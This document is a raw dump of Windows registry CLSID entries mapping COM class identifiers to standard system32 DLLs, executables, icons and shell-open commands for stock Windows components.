%SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D16B87DE-029E-4C85-92C8-ED8BBC5E882C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\Speech\SpeechUX\sapi.cpl,-2 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\Speech\SpeechUX\sapi.cpl,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl,-138 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D1915118-9D27-4C69-B82E-7955DAF57201}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d1934e71-740b-47cf-b051-6551e5b80fd5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d1a42999-0adf-11da-b070-0011856571de}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wcnwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D1E460DC-A564-4B5F-8B7D-CA3C1AC0C27C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D1E7EE36-6AA6-4dc2-90BB-16A722623B7D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D20EA4E1-3957-11d2-A40B-0C5020524153} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22921 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22982 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D20EA4E1-3957-11d2-A40B-0C5020524153}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-114 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D20EA4E1-3957-11d2-A40B-0C5020524153}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D215781D-019E-4FA0-903D-0CDCDE13A4F5}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\mofd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d23e6477-b104-4707-81cb-e1ca19a07016}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2423620-51A0-11D2-9CAF-0060B0EC3D39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D25D8842-8884-4A4A-B321-091314379BDD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D25E0260-AAB7-48CB-A192-4D73D2FD375F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D269BF5C-D9C1-11D3-B38F-00105A1F473A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D26DE5C1-C061-43F7-9C40-7517526CF1C1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hcproviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2942F8E-478E-41D3-870A-35A16238F4EE}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\console.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2AC2892-B39B-11D1-8704-00600893B1BD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmloader.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2C13906-51EF-454e-BC67-A52475FF074C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D79DF5-3400-11d0-B40B-00AA005FF586}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmintf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D79DF7-3400-11d0-B40B-00AA005FF586}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmintf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D94E72-DCDD-420A-B779-197EF796CC85}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2E0FE7F-D23E-48E1-93C0-6FA8CC346474} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63522 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2E7041B-2927-42fb-8E9F-7CE93B6DC937} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\colorui.dll,-1400 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d2ea46a7-c2bf-426b-af24-e19c44456399}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2ED260C-38F1-4ABE-8B2B-D4A088C54416}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d3162b92-9365-467a-956b-92703aca08af}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-112 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d3162b92-9365-467a-956b-92703aca08af}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D31B6A3F-9350-40DE-A3FC-A7EDEB9B7C63}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\cimwin32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D32CD718-970D-4496-B7A7-337BE8890145}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3341472-B542-4985-AACD-BE1403B96E6D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlidprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d34a6ca6-62c2-4c34-8a7c-14709c1ad938}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D34BD150-6D84-443E-83EE-04C7682377E4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D34BD155-6D84-443E-83EE-04C7682377E4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanconn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D36D2090-4DF3-4bd4-A22F-0D91975F7964}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D385FDAD-D394-4812-9CEC-C6575C0B2B38}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\NaturalLanguage6.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d3c0b79d-0fd2-4b5d-9bf6-5e41d6f15c08}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d3c0b79d-0fd2-4b5d-9bf6-5e41d6f15c08}\Instance\PropertySetStorage Schema REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3C4B7DB-E7BB-4778-89A2-E4B0EE41C29F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d3ca534d-3342-42b2-900b-1aceaff85e8a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.UI.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\mspaint.exe,-59418 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\AuxUserType\2 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\mspaint.exe,-59419 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\AuxUserType\3 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\mspaint.exe,-57344 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\mspaint.exe,-3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mspaint.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\Verb\0 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\mspaint.exe,-59420 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\Verb\1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\mspaint.exe,-59421 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d43f6fd5-904a-407f-97bc-5f8be75f532d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D44377B8-1F2F-4FAA-9C8E-6C4AD2928E47}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sysmain.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4480A50-BA28-11d1-8E75-00C04FA31A86} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\shwebsvc.dll,-2041 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4480A50-BA28-11d1-8E75-00C04FA31A86}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shwebsvc.dll,-107 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4480A50-BA28-11d1-8E75-00C04FA31A86}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-157 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D451359E-D6F4-45BB-8A05-271E8A98C740}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D46443F6-133B-4938-9C52-23B9EDD62CC3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D48DAF56-ADD3-4FDF-BC8C-C1F239115BBA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4C4F382-D9B2-41C9-8817-0DA701BB213B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4CA0E2D-6DA7-4b75-A97C-5F306F0EAEDC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4DCD3D7-B4C2-47D9-A6BF-B89BA396A4A3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4EFF9CD-16DE-446e-83C5-9537543CF4A1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sud.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d4f01ada-979c-491e-bac3-cd3c0e7bcf82}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5029E5D-F109-4BC0-B6DB-07F92D6ABAE7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d509c21a-b88c-4ad1-8fad-d6a7572728e5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d54378cd-91d8-4e10-a00b-819f9a9efcb1}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\printfilterpipelinesvc.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D555645E-D4F8-4c29-A827-D93C859C4F2A} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\accessibilitycpl.dll,-45#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\accessibilitycpl.dll,-10#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D555645E-D4F8-4c29-A827-D93C859C4F2A}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\accessibilitycpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D555645E-D4F8-4c29-A827-D93C859C4F2A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D555645E-D4F8-4c29-A827-D93C859C4F2A}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\accessibilitycpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D565943C-F4E8-4053-8319-064E8A7A4F26}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d58960ba-2ef3-4910-9e34-c911b1710180}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5978620-5B9F-11D1-8DD2-00AA004ABD5E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ES.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5978630-5B9F-11D1-8DD2-00AA004ABD5E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ES.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5978640-5B9F-11D1-8DD2-00AA004ABD5E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ES.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5978650-5B9F-11D1-8DD2-00AA004ABD5E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ES.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5B0F757-A97F-4311-B864-78D6094217C6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5B97D79-6DC3-403d-B178-59C0930C5DAC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ConsentUX.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5C66BE1-C209-11d1-8DEC-00C04FC2E0C7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5ED6B03-EDA3-4cbc-9FF1-60182438C8F6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WSDPrintProxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5F7E36B-5B38-445D-A50F-439B8FCBB87A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wscapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A5850-8F16-11CF-9F47-00AA00BF345C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\cimwin32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63AA156-D534-4BAC-9BF1-55359CF5EC30}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d63c23c5-53e6-48d5-adda-a385b6bb9c7b} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\ieframe.dll,-39170 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D65B9994-6416-41ED-84EE-08733558C381}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D66949A0-C766-48D7-B2C6-4A85382BE9C1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d66c2605-9d5d-475e-a5b8-3790743ee2ff}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D66D6F99-CDAA-11D0-B822-00C04FC9B31F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mlang.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6707039-94AB-490A-95D6-C268524D8B8F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6791A63-E7E2-4fee-BF52-5DED8E86E9B8} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\wpdshext.dll,-512 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\wpdshext.dll,-511 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6791A63-E7E2-4fee-BF52-5DED8E86E9B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wpdshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d69df9c0-ded9-4290-958f-93e82ea6a146}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d69e0717-dd4b-4b25-997a-da813833b8ac}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AUDIOENG.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6AC71F0-D4A7-41DD-88C4-B9985855D546}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppointmentActivation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6AD10F3-70AB-41E1-96B3-4C36E35D333C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6EBC66B-8921-4193-AFDD-A1789FB7FF57}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6F8EC75-A388-47de-BA3A-903B12A38E86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D6FEDB1D-CF21-4BD9-AF3B-C5468E9C6684}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D707877E-4D9C-11d2-8784-F6E920524153}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netplwiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D74DFA88-D5E3-41F6-B677-66FFB6591B00}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D772327B-027D-48BE-AD01-9FD96388255F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D78C3A7D-9018-41b6-9CE3-2BFDD45D45A1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D7B197F9-D109-4e8e-97B0-FC3886431A66}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D7B70EE0-4340-11CF-B063-0020AFC2CD35}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ddraw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d7bfd8f3-678c-4827-b84b-0e5fc6d15be3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D7C1AEB5-10F2-48cb-A182-F7EF79C51B19}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d7ca55ab-5022-4db3-a599-abafa358e6f3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D7F9888F-E3FC-49b0-9EA6-A85B5F392A4F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlidprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D82BE2B0-5764-11D0-A96E-00C04FD705A2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d84fa0c2-b0b3-4470-9345-75db0ec5a83a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D8636558-AAF6-49c1-8171-FFA6668B65A7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D8872739-DF50-4ED5-B8A7-F03DCD0DCD5A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rasdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d88dc591-4172-4a00-a6b1-7b657d2a6643}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d8a04f01-4570-45cc-bffa-37c79cf7208c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D8F0F5E7-11C5-4E95-BBFF-0F110C0221C4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DiagCpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d912f8cf-0396-4915-884e-fb425d32943b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d9162b5b-ca81-476e-a310-cb32d932733c}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\raschapext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d92bd3b9-99a0-4334-a497-11bcb093e9d2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D93CE8B5-3BF8-462C-A03F-DED2730078BA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\authui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D9403860-297F-4A49-BF9B-77898150A442}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D94EDF02-EFE5-4F0D-85C8-F5A68B3000B1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D957171F-4BF9-4de2-BCD5-C70A7CA55836}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d95b041d-fb4e-4886-b307-ef043d5bbc48}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingsHandlers_User.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D969A300-E7FF-11d0-A93B-00A0C90F2719}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d9b3211d-e57f-4426-aaef-30a806add397}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D9EF8727-CAC2-4e60-809E-86F80A666C91} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\fvecpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\fvecpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D9EF8727-CAC2-4e60-809E-86F80A666C91}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fvecpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D9EF8727-CAC2-4e60-809E-86F80A666C91}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D9EF8727-CAC2-4e60-809E-86F80A666C91}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\fvecpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D9F6EE60-58C9-458B-88E1-2F908FD7F87C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DA13DC3D-3F88-4A85-A89E-5735588A65E5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WsmAgent.dll 